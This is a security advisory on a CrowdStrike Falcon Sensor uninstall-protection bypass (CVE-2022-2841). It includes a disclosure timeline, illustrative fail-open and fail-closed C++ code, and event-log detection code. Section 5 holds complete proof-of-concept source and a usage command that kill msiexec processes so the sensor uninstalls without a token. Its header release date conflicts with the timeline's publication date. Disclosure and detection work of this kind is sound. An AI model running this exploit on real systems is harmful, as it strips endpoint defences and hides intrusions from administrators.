
[MZ-22-02] CrowdStrike FalconSensor

ID: MZ-22-02

Release: August 20, 2023

Credits: Pascal Zenker & Max Moser

------------------------------------------------------------------v1-
modzero Security Advisory [MZ-22-02]:
Uninstall Protection Bypass for CrowdStrike Falcon Sensor
---------------------------------------------------------------------

CrowdStrike Falcon is a cloud-powered endpoint detection and response
(EDR) and antivirus (AV) solution. On each end-device a lightweight
managed sensor is deployed that makes use of the cloud-based
capabilities. The sensor can be configured with an uninstall
protection, which prevents the uninstallation of the CrowdStrike
Falcon sensor on the end-device without a one-time generated token.

Exploiting this vulnerability allows  an attacker with administrative
privileges to  bypass the token  check on Windows end-devices  and to
uninstall the  sensor from  the device without  proper authorization,
effectively removing the device's EDR and AV protection.

---------------------------------------------------------------------
1. Timeline
---------------------------------------------------------------------

2022/04    - Found   vulnerability  in   CrowdStrike  Falcon   Sensor
             (6.31.14505.0)
             
2022/06/04 - modzero asked for a security contact at CrowdStrike,
             because their "report a security bug" page only referred
             to the hackerone Bug Bounty program.
             
2022/06/06 - CS answered that modzero can use the hackerone
             submission page, or send an e-mail to their support at
             support@crowdstrike.com.
             
2022/06/06 - modzero  asked   if  it   is  okay  to   send  sensitive
             information  about  0day  vulnerabilities  to  support@.
             modzero also told  CS that we are not  willing to accept
             terms & conditions  of hackerone, which is  why we asked
             for a direct security contact.
             
2022/06/06 - CS offered  to enroll  modzero in  a private  bug bounty
             program at  hackerone, under the conditions  that we are
             willing to sign a mutual non-disclosure agreement.
             
2022/06/07 - to prevent further misunderstandings, modzero told CS
             again that:

             * We would like to submit a security related bug.
             * We don't want to participate in any bug bounty
               programs.
             * We are not willing to sign any NDA because WE are the
               ones, providing information to CS.
             * We are not willing to accept any sort of terms and
               conditions that are out of scope of well known hacker
               ethics.
             * We only want to get a reliable security contact on
               their side.

             Additionally, modzero sent a link to their current
             vulnerability disclosure policy.

2022/06/07 - CS told us to send the report to bugs@ for review.
             
2022/06/13 - CS asked for the report.
             
2022/06/13 - modzero told CS  that we need a little bit  more time to
             finish and double check everything before submitting.
             
2022/06/29 - modzero sent Security Advisory (draft), Proof of Concept
             exploit sourcecode, executable and a Screencast video of
             the PoC to CS.
             
2022/06/29 - CS told us that we were testing only an unsupported
             version of the Falcon Sensor. CS told us about the error
             message and that they were not able to reproduce it.
             
2022/07/05 - modzero told CS that the error message can be ignored
             and referred to the PoC screencast video. We also asked
             for a recent (14-day trial) version of Falcon Sensor to
             provide reliable information on whether the most recent
             version is still vulnerable or not.
             
2022/07/05 - CS answered: "We  do not provide trial  licenses as part
             of this  process, however having  tested the PoC  on our
             end with  a modern sensor this  does not appear to  be a
             valid issue."
             
2022/07/05 - modzero  announced publishing  the advisory  and exploit
             code by end  of week, asking if the quote  of CS "Having
             tested the PoC on our end with a modern sensor this does
             not  appear to  be a  valid issue"  can be  used in  our
             report.
             
2022/07/06 - CS asked for a meeting between modzero's Sr Leadership
             and CS to discuss next steps related to the bug bounty
             disclosure.
             
2022/07/07 - modzero again told CS that we are not participating in
             any bug bounty program and that there is no need to
             discuss NDAs or bug bounty programs.
             
2022/08/12 - modzero managed to acquire a recent version (6.42.15610)
             of CrowdStrike Falcon and verified that the attack is
             still possible. Furthermore, modzero figured out that
             the vulnerability (that was rejected by CrowdStrike
             first) has been silently fixed: The PoC that had been
             sent to CrowdStrike was flagged as malicious. The
             msiexec call of the uninstaller was also flagged as
             malicious. Both "countermeasures" can be circumvented
             easily; we updated the exploit accordingly.
             
2022/08/22 - modzero   publishes   Security  Advisory   and   exploit
             code,  because  CrowdStrike  was  unwilling  to  set  up
             a  cooperative  information  exchange outside  of  their
             NDA-ridden bug bounty program to discuss vulnerabilities
             in their products.

---------------------------------------------------------------------
2. Summary
---------------------------------------------------------------------

Vendor: CrowdStrike 
Homepage: https://www.crowdstrike.com/endpoint-security-products/falcon-endpoint-protection-enterprise/

Error Class: 

* CWE-691: Insufficient Control Flow Management 
(https://cwe.mitre.org/data/definitions/691.html)

The  code  does  not  sufficiently manage  its  control  flow  during
execution,  creating conditions  in  which the  control  flow can  be
modified in unexpected ways.

Products known to be affected: 

* CrowdStrike Falcon (6.31.14505.0)
* CrowdStrike Falcon (6.42.15610)

Please note: other versions might be affected as well, but were not
tested by modzero.

CVE-ID: CVE-2022-2841
Severity: Medium/4.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)
Vendor: CrowdStrike
Product: CrowdStrike Falcon
Version: 6.42.15610
Attack type: Local
Affected Components: Uninstall Protection

---------------------------------------------------------------------
3. Details
---------------------------------------------------------------------

CrowdStrike Falcon is a cloud-native antivirus (AV) and endpoint
detection and response (EDR) solution for end-devices. A sensor agent
is deployed on each end-device, which is then managed by and
connected to a cloud monitoring system.

The "Uninstall Protection" feature locks down devices and prevents
device users, including administrators, from removing the sensor
agent without a one-time, device-specific maintenance token.

During  a  security  analysis modzero  was  required  to uninstall  a
CrowdStrike  Falcon  Sensor  installation  on  a  Windows workstation
without having access to the maintenance token.

After analysing the software removal procedure, it was possible to
develop an automated proof-of-concept tool that corrupts the
CrowdStrike Falcon Sensor removal process: it starts the regular MSI
uninstall and terminates specific msiexec processes that the installer
spawns while it runs. As a result, the token check fails, but the
removal procedure continues instead of aborting, so the maintenance
token is effectively ignored.

This allows an  attacker with administrator  rights to uninstall  and
stop  the CrowdStrike  Falcon Sensor  and its  corresponding  Windows
services without a valid token.
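
The control-flow weakness itself, modelled in portable C++ as an added
example (this is not modzero's PoC and not CrowdStrike's code; the
step names, the status codes and the sequencer logic are assumptions
made to illustrate the CWE-691 pattern): the vulnerable sequencer only
aborts on an explicit "token invalid" verdict, so a token check whose
helper process was killed and therefore never reported a verdict falls
through to the removal steps. The hardened sequencer treats the token
check as a gate that must return a positive result before any removal
step is allowed to run.

```cpp
// Added example: a model of a fail-open vs. a fail-closed uninstall
// sequencer. Not the Falcon Sensor's real uninstall logic; the step
// names and status codes are assumptions for illustration.
#include <cstdio>
#include <functional>
#include <string>
#include <vector>

// What one uninstall step can report, modelled on the three things a
// custom action run by a helper process can do: succeed, report that
// the maintenance token does not match, or never report at all because
// the helper was terminated before it could answer.
enum class StepStatus { Ok, TokenInvalid, HelperDied };

struct Step {
    std::string name;
    std::function<StepStatus()> run;
};

// Record of what a sequencer did, so the outcome can be inspected.
struct Trace {
    std::vector<std::string> executed;
    bool removed = false;       // did the "remove_files" step run?
    std::string abort_reason;   // empty when the sequence completed
};

// Vulnerable sequencer: only an explicit TokenInvalid verdict stops the
// uninstall. A HelperDied status is logged as a warning and the loop
// continues, so a killed token-check helper lets removal proceed.
Trace run_fail_open(const std::vector<Step>& steps) {
    Trace t;
    for (const Step& s : steps) {
        t.executed.push_back(s.name);
        StepStatus st = s.run();
        if (st == StepStatus::TokenInvalid) {
            t.abort_reason = s.name + ": maintenance token rejected";
            return t;
        }
        if (st == StepStatus::HelperDied)
            std::printf("[warn] %s: helper did not report, continuing\n",
                        s.name.c_str());
        if (s.name == "remove_files") t.removed = true;
    }
    return t;
}

// Hardened sequencer: anything other than a positive Ok from the token
// check aborts (fail closed), and removal refuses to run unless the
// gate was actually observed earlier in the sequence.
Trace run_fail_closed(const std::vector<Step>& steps) {
    Trace t;
    bool token_verified = false;
    for (const Step& s : steps) {
        t.executed.push_back(s.name);
        StepStatus st = s.run();
        if (s.name == "check_token") {
            if (st != StepStatus::Ok) {
                t.abort_reason = "check_token: no positive verdict";
                return t;
            }
            token_verified = true;
        } else if (st != StepStatus::Ok) {
            t.abort_reason = s.name + ": step failed";
            return t;
        }
        if (s.name == "remove_files") {
            if (!token_verified) {
                t.abort_reason = "remove_files: token never verified";
                return t;
            }
            t.removed = true;
        }
    }
    return t;
}

// Assumed uninstall sequence with a pluggable token-check outcome.
std::vector<Step> uninstall_sequence(StepStatus token_outcome) {
    return {
        {"stop_services", [] { return StepStatus::Ok; }},
        {"check_token",   [token_outcome] { return token_outcome; }},
        {"remove_files",  [] { return StepStatus::Ok; }},
        {"unregister",    [] { return StepStatus::Ok; }},
    };
}

int main() {
    // Scenario from the advisory: the helper running the token check is
    // terminated, so it never returns a verdict.
    Trace open_t = run_fail_open(uninstall_sequence(StepStatus::HelperDied));
    Trace closed_t = run_fail_closed(uninstall_sequence(StepStatus::HelperDied));
    std::printf("fail-open:   removed=%d abort='%s'\n",
                (int)open_t.removed, open_t.abort_reason.c_str());
    std::printf("fail-closed: removed=%d abort='%s'\n",
                (int)closed_t.removed, closed_t.abort_reason.c_str());
    return 0;
}
```

Run stand-alone, the program prints one line per sequencer for the
"helper killed" scenario: the fail-open variant reports removed=1 with
no abort reason, the fail-closed variant reports removed=0 and the
reason it stopped. The point of the hardened variant is that "the
check did not say yes" and "the check said no" are handled the same
way; the vulnerable variant only handles the second.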

---------------------------------------------------------------------
4. Impact
---------------------------------------------------------------------

An attacker with administrative access to a machine can bypass the
"Uninstall Protection" of the CrowdStrike Falcon Sensor.

The   attack   removes   the   software,   leaving   the  CrowdStrike
administrator  in  the  dark  about  potential  attacks  on  the  now
unprotected endpoint.

This is particularly  undesirable, given that this is a  cloud-native
service where customers expect alerts for security-related actions.
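
A detection pass that closes this visibility gap on the host side, as
an added example (not part of the modzero advisory and not CrowdStrike
code): it walks exported Windows Installer and Service Control Manager
events, flags removal of the sensor package (MsiInstaller event IDs
1034 and 11724) and stops of the sensor service (SCM event ID 7036),
and marks whether a maintenance token had actually been issued for the
host. The event IDs and message wording are the standard Windows ones;
the tab-separated export format, the sample lines, the host names, the
product and service names, and the set of hosts with issued tokens are
constructed assumptions for this example.

```cpp
// Added example: flag Falcon sensor removal / service stop events and
// check them against the hosts that were actually issued a maintenance
// token. Event formats follow Windows' MsiInstaller 1034/11724 and SCM
// 7036 text; product/service/host names and the export layout are
// assumptions.
#include <cstdio>
#include <set>
#include <string>
#include <vector>

struct Event {
    std::string time, host, source;
    int id = 0;
    std::string message;
};

struct Alert {
    std::string host, reason;
    bool authorized;   // a maintenance token was issued for this host
};

// Parse one exported line "time<TAB>host<TAB>source<TAB>id<TAB>message".
// Returns false on malformed input so a bad line cannot hide an event.
bool parse_event(const std::string& line, Event& out) {
    std::vector<std::string> f;
    size_t start = 0;
    for (int i = 0; i < 4; ++i) {
        size_t tab = line.find('\t', start);
        if (tab == std::string::npos) return false;
        f.push_back(line.substr(start, tab - start));
        start = tab + 1;
    }
    out.time = f[0]; out.host = f[1]; out.source = f[2];
    try { out.id = std::stoi(f[3]); } catch (...) { return false; }
    out.message = line.substr(start);
    return true;
}

bool is_parseable(const std::string& line) { Event e; return parse_event(line, e); }

// Flag sensor removal (MsiInstaller 1034 / 11724) and sensor service
// stops (SCM 7036) whose message mentions `marker`, and note whether
// the host is in the set of hosts a maintenance token was issued to
// (standing in for what the management console knows).
std::vector<Alert> scan(const std::vector<std::string>& lines,
                        const std::string& marker,
                        const std::set<std::string>& tokens_issued_to) {
    std::vector<Alert> alerts;
    for (const std::string& line : lines) {
        Event e;
        if (!parse_event(line, e)) continue;
        if (e.message.find(marker) == std::string::npos) continue;
        std::string reason;
        if (e.source == "MsiInstaller" && (e.id == 1034 || e.id == 11724))
            reason = "sensor package removed";
        else if (e.source == "Service Control Manager" && e.id == 7036 &&
                 e.message.find("stopped state") != std::string::npos)
            reason = "sensor service stopped";
        if (reason.empty()) continue;
        alerts.push_back({e.host, reason, tokens_issued_to.count(e.host) > 0});
    }
    return alerts;
}

int unauthorized_count(const std::vector<Alert>& alerts) {
    int n = 0;
    for (const Alert& a : alerts) if (!a.authorized) ++n;
    return n;
}

// Constructed sample export: an unauthorized removal on WS-0042, an
// unrelated product removal on the same host, and a removal on WS-0007
// for which a token had been issued.
const std::vector<std::string> kSampleLog = {
    "2022-09-01T10:40:59Z\tWS-0042\tService Control Manager\t7036\tThe CrowdStrike Falcon Sensor Service service entered the stopped state.",
    "2022-09-01T10:41:03Z\tWS-0042\tMsiInstaller\t1034\tWindows Installer removed the product. Product Name: CrowdStrike Sensor Platform. Product Version: 6.42.15610.0. Product Language: 1033. Manufacturer: CrowdStrike. Removal success or error status: 0.",
    "2022-09-01T10:41:05Z\tWS-0042\tMsiInstaller\t11724\tProduct: CrowdStrike Sensor Platform -- Removal completed successfully.",
    "2022-09-01T11:02:10Z\tWS-0042\tMsiInstaller\t1034\tWindows Installer removed the product. Product Name: Example Editor. Product Version: 1.0. Product Language: 1033. Manufacturer: Example Corp. Removal success or error status: 0.",
    "2022-09-01T14:15:00Z\tWS-0007\tMsiInstaller\t11724\tProduct: CrowdStrike Sensor Platform -- Removal completed successfully.",
};

int main() {
    std::vector<Alert> alerts = scan(kSampleLog, "CrowdStrike", {"WS-0007"});
    for (const Alert& a : alerts)
        std::printf("%s %s: %s\n", a.authorized ? "[info] " : "[ALERT]",
                    a.host.c_str(), a.reason.c_str());
    return 0;
}
```

Run stand-alone it prints [ALERT] for the three WS-0042 events and
[info] for the WS-0007 removal. In practice the authorized-host set
would be fed from the console's maintenance-token issuance records, so
a removal on a host that was never issued a token is an incident, not
a configuration change.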

---------------------------------------------------------------------
5. Proof of Concept
---------------------------------------------------------------------

The following proof-of-concept code allows an administrator to remove
the CrowdStrike Falcon Sensor without a maintenance token:

//
// CrowdStrike Falcon Sensor
// De-Installation Auth-Bypass Proof-of-Concept
//
// Falcon Sensor is installed with an uninstall protection, to prevent unauthorized administrators
// from removing Falcon Sensor. The following Proof-of-Concept exploit allows to bypass the
// uninstall protection (token check). This can be used to remove the endpoint's EDR and AV protection.
//
// References:
// - modzero MZ-22-02 Security Advisory
// - CVE: CVE-2022-2841
//
// Version: 0.3
// Secrecy: CONFIDENTIAL
// Copyright 2022, modzero AG, Wartstr. 20, 8400 Winterthur, Switzerland
//
// Usage example:
//   .\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi'
//

// The process-name matching below uses wide-character string functions,
// so build as Unicode (TCHAR == wchar_t) regardless of project settings.
#ifndef UNICODE
#define UNICODE
#endif
#ifndef _UNICODE
#define _UNICODE
#endif
#define _CRT_SECURE_NO_WARNINGS

#include <windows.h>
#include <psapi.h>
#include <tchar.h>
#include <stdio.h>
#include <algorithm>
#include <cstdlib>
#include <iostream>
#include <list>
#include <string>

// msiexec.exe instances seen so far (the installer spawns several of
// them during the uninstall), newest first, plus a running count.
std::list<DWORD> g_msiexec_instances = {};
int g_msiexec_instance_count = 0;

void CheckProcess(DWORD process_id)
{
    TCHAR process_name[MAX_PATH] = { 0 };
    HANDLE h_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    if (nullptr == h_proc) {
        // Protected process or already gone: nothing to do.
        return;
    }

    HMODULE h_mod = 0;
    DWORD c_need = 0;

    // The first module of a process is its main executable; its base
    // name tells us whether this is an msiexec.exe instance.
    if (EnumProcessModules(h_proc, &h_mod, sizeof(h_mod), &c_need)) {

        GetModuleBaseName(h_proc, h_mod, process_name,
            sizeof(process_name) / sizeof(TCHAR));
    }

    if (wcsstr(_wcslwr(process_name), _T("msiexec"))) {

        bool already_found = (
            std::find(
                g_msiexec_instances.begin(),
                g_msiexec_instances.end(),
                process_id) != g_msiexec_instances.end()
            );

        if (!already_found) {

            g_msiexec_instance_count++;
            std::cout << "[+] Installer spawned process: " << process_id << std::endl;

            g_msiexec_instances.push_front(process_id);

            // The fourth and fifth msiexec instances spawned during the
            // uninstall are terminated to leave open MSI handles behind.
            // This breaks the uninstaller's token check: an "invalid
            // token" error is shown, but the removal continues anyway.

            if (g_msiexec_instance_count == 4 || g_msiexec_instance_count == 5) {

                std::cout << "[+] Killing process: " << process_id << std::endl;

                if (!TerminateProcess(h_proc, 123)) {
                    std::cout << "[!] Failed to kill process with PID " << process_id << ": " << GetLastError() << std::endl;
                }

                if (g_msiexec_instance_count == 5) {
                    std::cout << "[+] Uninstall Protection should be bypassed." << std::endl;
                    CloseHandle(h_proc);
                    exit(0);
                }
            }
        }
    }

    CloseHandle(h_proc);
}

int main(int argc, char* argv[])
{
    DWORD proc_ids[1024] = { 0 };
    DWORD c_need = 0;
    DWORD c_procs = 0;
    DWORD i = 0;

    if (argc != 2) {
        std::cout << "Usage:" << std::endl << argv[0] << " PATH_TO_CsAgent.LionLanner.msi" << std::endl;
        return 1;
    }

    // Extract the MSI product code ({GUID}) from the Package Cache path;
    // that is all msiexec needs to start the uninstall.
    std::string path = std::string(argv[1]);
    size_t first = path.find("{");
    size_t last = path.find_last_of("}");
    if (first == std::string::npos || last == std::string::npos || last < first) {
        std::cout << "[-] No {GUID} product code found in path: " << path << std::endl;
        return 1;
    }
    std::string guid = path.substr(first, last - first + 1);
    std::string cmd = "start msiexec /x " + guid;

    // Increase priority to realtime so the polling loop below catches the
    // short-lived msiexec children before they finish, then start the
    // uninstall in the background.
    SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
    system(cmd.c_str());

    // Now listen for processes popping up. The loop only ends via exit()
    // in CheckProcess once the fifth msiexec instance has been killed.
    while (1) {

        if (!EnumProcesses(proc_ids, sizeof(proc_ids), &c_need)) {
            std::cout << "[-] Failed to read processes." << std::endl;
            return 1;
        }

        c_procs = c_need / sizeof(DWORD);

        // Check every process ID
        for (i = 0; i < c_procs; i++) {

            if (proc_ids[i] != 0) {
                CheckProcess(proc_ids[i]);
            }
        }
    }

    return 0;
}

To use the Proof of Concept, the code must be compiled with Visual
Studio and run from an elevated (administrator) prompt, with the path
to `CsAgent.LionLanner.msi` in the Package Cache as its only argument,
e.g.:

.\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi'

After executing it, the software removal procedure starts and a popup
with an error message that the token is invalid shows up. After
closing the popup, the uninstallation continues and removes all
components, i.e. the failed token check does not abort the removal.

---------------------------------------------------------------------
6. Fix
---------------------------------------------------------------------

- n/a

---------------------------------------------------------------------
7. Credits
---------------------------------------------------------------------

  * Pascal Zenker (parzel) of modzero
  * Max Moser (mmo) of modzero

---------------------------------------------------------------------
8. About modzero
---------------------------------------------------------------------
 
The independent  Swiss-German  company  modzero assists  clients with
security analysis  in the complex  areas of computer  technology. The
focus  lies on  highly  detailed  technical  analysis  of   concepts,
software  and  hardware  components as  well as  the  development  of
individual  solutions.  Colleagues  at  modzero work  exclusively  in
practical, highly  technical computer-security  areas and can draw on
decades of  experience  in various  platforms,  system concepts,  and
designs.

https://www.modzero.com contact@modzero.com

modzero follows coordinated disclosure practices described here:

https://www.modzero.com/static/modzero_Disclosure_Policy.pdf.

This policy  should  have been  sent to  the vendor  along with  this
security advisory.

---------------------------------------------------------------------
9. Disclaimer
---------------------------------------------------------------------
 
The information  in the advisory  is believed  to be accurate  at the
time of publishing based  on currently available  information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no  warranties  concerning  this  information. Neither  the
author  nor the  publisher  accepts  any liability  for  any  direct,
indirect, or  consequential  loss or  damage  arising from  using, or
reliance on, this information.
